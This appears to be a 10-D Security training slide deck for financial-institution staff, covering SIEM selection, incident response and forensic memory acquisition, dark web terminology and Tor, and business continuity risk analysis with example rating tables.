_____________________________________________________________________________________
_____________________________________________________________________________________

SIEM Systems
A few SIEM examples

• Solarwinds
• AlienVault
• Netwrix
• ManageEngine
• Splunk
• LogRythm
• McAfee
• Sergeant Laboratories
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

SIEM Selection Considerations

• Integration of traditional logs with other event sources, such as Threat
Intel, Identity and Access Management systems (IAM), Database Activity
Monitoring (DAM), NetFlow/DPI, File Integrity Monitoring and Application
logging
• Summarization tables, Reports and “Widgets”
• Scalability; from SMB to large implementations
• Import and export of content (rules, reports, trends)
• Ability to create custom log source feed
• Reusable and movable objects
• Health status monitoring
• Integration with a ticketing/workflow system, or Configuration
Management Database (CMDB)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Inputs Gathering Analysis
Assets
No
Log Server
Server
Investigate if there
No is a Material
Log File Impact
Router
Activity Seen before?
Log File Yes

Workstation
Yes
Activate
Firewall IDS IPS Log File Incident Response

Core, Helpdesk
Tickets, etc.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 5: Incident Response

Topics:
• First Responder Actions
• Preservation of Evidence / Information
• Chain of Custody
• Handling of Mobile Devices
“It’s easier to implement cybersecurity than to deal with cyber-adversity.”

“It takes 20 years to build a reputation and few minutes of cyber-incident to
ruin it.”
- Stephane Nappo
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Incident Response
From the FFIEC:
Financial institutions and their service providers should anticipate
potential cyber incidents and develop a framework to respond to these
incidents...
A financial institution experiencing a cyber attack may need to
simultaneously investigate an ongoing security incident and execute the
financial institution's recovery strategies. As a result, the financial
institution and TSP should consider identifying and making advance
arrangements for third-party forensic and incident management services.
Also, a financial institution relying on such third-party services should
plan for potential limited availability during a large-scale cyber event.
(IT Examination Handbook –
Business Continuity Planning, 2015)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Incident Response Lifecycle
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Incident Response
Containment – Things to avoid:

• Don’t shut down systems until you’ve collected evidence. Much evidence
may be lost and the attacker may have altered the startup/shutdown
scripts/services to destroy evidence. In particular, do not shut the system
down until all volatile data (memory) has been collected.
• When volatile data has been collected, pull the power plug to “freeze”
system as-is.
• Don’t trust the programs on the system, they may have been
compromised. Run your evidence gathering from protected media.
• Don’t use programs that modify access times on files (e.g., “tar,” “xcopy”)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Order of Volatility
The "order of volatility" is simply the order and lifespan of digital

evidence. Understanding this concept is crucial in collecting the
right data in the right order before it disappears forever.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Order of Volatility
When collecting evidence you should begin with the most

volatile and proceed to the least volatile. The order of volatility,
from most to least, is:
• CPU cache and register contents
• System and network processes, routing tables and kernel statistics
• Swap files (page files) stored on local disk
• Data stored on local disks
• Logs stored on remote systems
• Archival media
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Volatile Data - Memory Acquisition

Why capture live memory?
• Everything traverses RAM
• Processes & threads
• Network sockets, URLs, IP addresses
• Open files
• User content
• Passwords
• Clipboard
• Caches
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Volatile Data - Memory Acquisition
• Registry contents (most, not all)

• Encryption keys
• Software configurations
• Hardware configurations
• Event logs (most, not all)
• Chat logs, private messages
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Memory Analysis
• Malware cannot hide in memory like it can on disk

• Root-kits often can only be found through memory analysis
• Hidden process are not hidden in memory
• New malware is “memory resident only”
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Tools to Collect Memory - Examples
• FTK Imager (www.accessdata.com)

• Belkasoft RAM Capturer (belkasoft.com/ram-capturer)
• Dumpit (www.comae.io)
• Helix Pro (www.e-fense.com)
• WinPMEM (http://www.rekall-forensic.com/)
• Macquisition
(www.blackbagtech.com/software-products/macquisition-7/macquisition.html)
Note: You will need Local Admin access to run the tools.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

FTK Imager (www.accessdata.com)
• Freeware version is part of larger forensic suite

• Many options
• Can image drives as well
• GUI tool
• Was one of the first tools to capture memory
• Demo
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Belkasoft RAM Capturer

(belkasoft.com/ram-capturer)
• Freeware tool
• Designed to not be stopped by anti-forensics
• Simple to use
• Small footprint
• GUI tool
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Dumpit (www.comae.io)
• Freeware tool
• Easiest tool to use, point and click
• No options
• Single purpose tool
• Small footprint
• GUI tool
• Demo
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Helix Pro (www.e-fense.com)
• Pay for use software

• Collects more than just memory
• More options, but somewhat limited
• GUI tool
• Can be used to image drives as well
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

WinPMEM (www.rekall-forensic.com/)
• Open-source (free)
• Some technical expertise is required
• Command line only, with many options and parameters
• Enables compression by default
• Great for use with scripting
• Dumps loaded drivers by default
• Demo
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Macquisition
(www.blackbagtech.com/software-products/macquisition-7/macquisition.html)
• Commercial (not free) tool

• Use for Apple Mac OS X systems
• GUI tool
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Forensic Toolbox - Building vs Buying
• Building your own is cheaper

• Can customize what you want to collect
• Offers the most flexibility in collection
• Often a steep learning curve
• Must test, update, and maintain tools yourself
• Support may be an issue
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Forensic Toolbox - Building vs Buying
• Costs can vary from $ to $$$$$$

• Sometimes limited to vendor’s workflow
• Often not as flexible
• Support is always a plus
• Vendor will update tools for you
• CYA factor can be a plus
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

HDD Acquisition
• Prior methodology was to pull the power and remove disk

• Drive sizes today often make drive analysis impractical to the
“novice” investigator
• Forensic responder should have tools/skills to properly
perform
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Security Intelligence
• Utilize information from initial findings to search enterprise for additional
compromised hosts.
• Each new piece of information feeds the process until the entire breadth
of the compromise is revealed.
• Attackers are advanced but generally like to use the same tools and
techniques; they are human just like the rest of us.
• Indicators such as IP addresses, filenames, checksums, driver names,
service names, registry entries, etc. can all be used to search the
enterprise.
Do not assume that one compromised machine is all there is.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Forensic Responder
If required on-site:
• Requires a trained incident responder at each location to perform
collection
• Usually involves travel to each affected location; does not scale well
• Often delays investigation analysis
• Typical time from first call to initial triage is 8-24 hours (depending on staff
availability and retainer response agreements)
• Your cyber-insurance provider may provide a responder, or have preferred
firms to call upon (and therefore may cover some/all the cost)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Mobile Devices
Mobile device forensics is a specialized subset in the forensics world. If
you are going to allow mobile devices you should have a plan on how
to safely acquire and analyze them.
• Using a MDM platform (mobile device management) is the best way to
ensure data retrieval or integrity
• If you need to respond to an incident involving a mobile device:
– Gain physical access to device if possible
– Capture device, OS and app baseline
– Isolate the device if possible (airplane mode, Faraday bag, etc.)
– Perform acquisition using appropriate software
– Analyze device and app artifacts
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Legal issues
• Most (almost all) intrusions will never see a courtroom, any

really good information will be handed over to the
appropriate government agency and pursued by them.
• Usually only in-house issues (e.g., employee theft) will require
extensive legal work.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Chain of Custody
You should be able to clearly describe how the evidence was
found, handled, and everything that happened to it along the
way. The following need to be documented:
• Where, when, and by whom was the evidence discovered and collected.
• Where, when and by whom was the evidence handled or examined.
• Who had custody of the evidence, during what period.
• How it was stored.
• When the evidence changed custody, when and how did the transfer
occur (include shipping numbers, etc.).
(See sample form included with course materials)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Incident Response - Management

Additional items to consider:
• Develop “playbooks” for potential events (e.g., malware, ransomware, DDoS, etc.)
• Consider extremes – false positive vs. extensive breach
• Conference bridge
– Consider secured line to avoid eavesdropping
– External number/off-site, in case incident affects voice system
– Scheduled updates – regular updates
– Setup and have number known in advance
• Managing an in-depth investigation
– Customer impact – Inconvenience, credit monitoring, reputation, litigation
– Costs – Overtime, vendors, remediation
– Employee fatigue – Errors, morale, terminations
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 6: Dark Web

Topics:
• Overview: Surface Web - Deep Web – Dark Web
• Terminology
• How the Dark Web operates
• Dark Web Live Demo
“The world doesn’t change in front of your eyes, it changes behind your
back.”
- Terry Hayes, I Am Pilgrim
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

(not picked up by search engines)
(only accessible with Dark Web browser)
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Terminology
Carding - The trafficking of credit card, bank account and other

personal information online as well as related fraud services. Activities
also encompass procurement of details, and money laundering
techniques.
Dox – To publicly identify or publish private information about

someone, typically with malicious intent. Doxxing is when someone’s
personal or identifiable info is made available on the internet, and
frequently includes address, phone number, and place of work.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Terminology
Dump - An unauthorized copy of information contained in the

magnetic strip of an active credit card, created with the intention of
illegally making a fake credit card that can be used by cybercriminals to
make purchases. Value of a dump increases with the amount of
associated information (i.e., track 1 & 2), CVV, ZIP code, DoB, MMN,
SS#, PIN, debit vs. credit, etc.)
Fullz - A term used by credit card hackers and data resellers meaning
full packages of individuals' identifying information. Fullz usually
contain an individual's name, Social Security number, date of birth,
account numbers, and other data.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Terminology
Tor – (The Onion Router) Is an open-source public project that

provides an anonymous, or at least difficult to track, method to
communicate on the internet. The Tor browser is used to access public
sites anonymously, as well as websites that are only known to the Tor
network.
.onion – The “host suffix” on a hidden service (e.g.,

“zqktlwi4fecvo6ri.onion”). This designates a hidden service or site that
is only reachable using Tor. .onion addresses are registered when a
hidden service is setup. This is used as another step in concealing the
service and the user’s activity.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Tor
“…is relied upon by journalists, activists and campaigners in the US
and Europe as well as in China, Iran and Syria, to maintain the privacy
of their communications and avoid reprisals from government. To this
end, it receives around 60% of its funding from the US government,
primarily the State Department and the Department of Defense –
which houses the NSA.”
TheGuardian.com
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The Tor Project, Inc. is the owner and originator of this content.
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

VPN Relay
Using a VPN further protects

the anonymity of the user.
If the first Tor node is
compromised, the IP of Alice’s
computer is not disclosed. It
may also circumvent some
filters.
The Tor Project, Inc. is the source for portions of this content.
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 7: Business Continuity

Topics:
• Business Impact Analysis (BIA)
• Plan Development
• Pandemic Planning
• Communications
• Training and Testing
• The Declaration
“It wasn’t raining when Noah built the ark.”

- Howard Ruff
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Key Phrases
Recovery Time Objective (RTO)
• Defines the maximum tolerable length of time a service can be
unavailable.
• Put another way, it is the time between the disaster event and when the
service is back on-line.
Recovery Point Objective (RPO)

• Defines the acceptable amount of information that can be lost due to a
disaster event.
• Put another way, it is the time between the last data backup and the
disaster event.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Key Phrases
Recovery Point Objective vs. Recovery Time Objective
RTO – time
RPO – time between event
between most and when
recent backup service was
and event restored
Past
Event Future
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Business Impact Analysis (BIA)

The process of analyzing all business functions and the effect
that a disaster may have upon them. The BIA process should:
– Identify critical functions and processes; and impact on business if they
are lost
– Determine systems, applications, vendors, etc. needed to perform the
business functions
– Identify interdependencies between functions and processes
– Determine outage tolerances and recovery time objectives (How much
information can you stand to lose?)
– Document your recovery priorities
– Evaluate recovery capabilities and facilities to determine whether they
can support your recovery priorities
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Business Impact Analysis (BIA)

Outage Tolerance by Function – Example
Recovery 24-hour Revenue
Business Function RTO RPO Priority Loss
Telephone & Voicemail 4 hrs NA Critical <$5K
Personal Computers (PC) 1 day NA Critical $10K
Core 1 day No loss Critical $50K
Wires 1 day No loss Critical $25K
Loan processing 3 days 1 day Critical $1M
E-mail 3 days 1 day Essential NA
Internet Banking 3 days No loss Essential $50K
Fraud Detection 5 days 1 day Essential $100K
ACH 5 days No loss Essential $50K
Payroll 5 days 1 day Essential NA
Employee directory 10 days NA Important NA
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Continuity Risk Analysis
The process by which potential threats to business operations

are identified; whether human, natural, or technical. Once the
threats have been identified, the probability and severity index
for the risk is determined. A rating is assigned based on the
probability and impact of the risk on the business. A Risk
Analysis should:
– Identify potential threats to the organization.
– Determine the probability of those threats occurring.
– Determine the potential impact (risk) of the threats.
– Recommend controls and safeguards to minimize the impact on the
organization.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Continuity Risk Rating Factors

Probability Assessment
1 Low - Threat exists, occurrence not probable
5 Medium - Threat exists, occurrence probable, but target unknown
10 High - Threat exists, occurrence probable, and target known
Impact Assessment
0 No Impact or interruption in operations.
1 Noticeable impact, interruption in operations for up to one
calendar day.
2 Damage to equipment and/or facilities and/or interruption of
operations for two to three calendar days.
3 Major damage to equipment and/or facilities and/or interruption
of operations for more than three calendar days.
• Probability x Impact = Weighted Risk Rating (WRR)

• WRR > 15 poses the GREATEST RISK!
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Natural Threats - Example
Weighted Risk
Event Probability Impact Rating
Disease Epidemic 10 3 30
Earthquake 5 2 10
Electrical Storm 10 1 10
Fire (internal) 5 2 10
Flooding (external) 10 1 10
Flooding (internal) 5 2 10
Snow and Ice Storm / Blizzard 10 2 20
Thunderstorm (damaging hail/wind/rain) 10 1 10
Tornado 5 3 15
WRR > 15 poses the GREATEST RISK
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Technical Threats - Example
Weighted Risk
Computer Failure (Network / Server) 10 3 30
Computer Failure (other Hardware) 10 3 30
Computer Failure (Software) 10 3 30
Hazardous Materials Spill 1 3 3
HVAC Failure 10 1 10
Power Failure / Fluctuation 5 2 10
Radiological / Nuclear Accident 1 3 3
Telecom Failure 5 1 5
Water / Sewer Damage 5 2 10
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Human Threats - Example
Weighted Risk
Bomb Threat 10 1 10
Computer (human error) 5 2 10
Criminal Act (against persons) 5 1 5
Criminal Act (against property) 10 2 20
Kidnap 1 2 2
Riot / Civil Disorder 1 1 1
Sabotage (by employee) 10 2 20
